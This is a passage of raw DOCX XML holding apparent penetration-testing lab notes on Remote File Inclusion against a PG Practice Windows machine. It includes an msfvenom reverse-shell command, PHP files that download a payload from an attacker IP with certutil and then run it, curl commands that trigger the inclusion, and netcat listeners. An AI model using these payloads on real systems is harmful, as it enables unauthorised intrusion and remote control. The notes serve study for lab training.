      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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D4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_40zvdj3piq73" w:id="232"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An example of RFI was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId552">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PG Practice for windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We tried accessing a file in our Kali using the URL and we got requests back on our python host listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then hosted a reverse shell and started listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="210"/>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1BDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then sent RFI payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="210"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/phpreverseshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="711200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="372" name="image360.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image360.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId553"/>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1BE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From phpinfo.php, we can see that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is on and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are on, meaning we can do RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test for RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we try to put our Kali tun0 IP address and a made up request in the URL bar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="469900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="509" name="image491.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image491.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId554"/>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1BEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId555"/>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BEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we should get a GET request back on our listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means RFI is possible!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First create rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;YOUR tun0 IP&gt; LPORT=135 -f exe &gt; rev.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we need to create two PHP files that we will be able to execute via curl (thanks to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting spotted in phpinfo). We can call them step1.php and step2.php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step1.php (Be sure to use your tun0 IP address not mine seen below)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('certutil.exe -urlcache -split -f "http://192.168.45.195/rev.exe" rev.exe', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step2.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('rev.exe', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener and make sure the 2 steps and rev shell in same directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="549" name="image522.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image522.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55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BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 135</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally we will start curling the two PHP files. This will both retrieve </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute our PHP files. (Your IP addresses will be different)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i http://192.168.212.53:4443/site/index.php?page=http://192.168.45.195/step1.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="149" name="image140.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
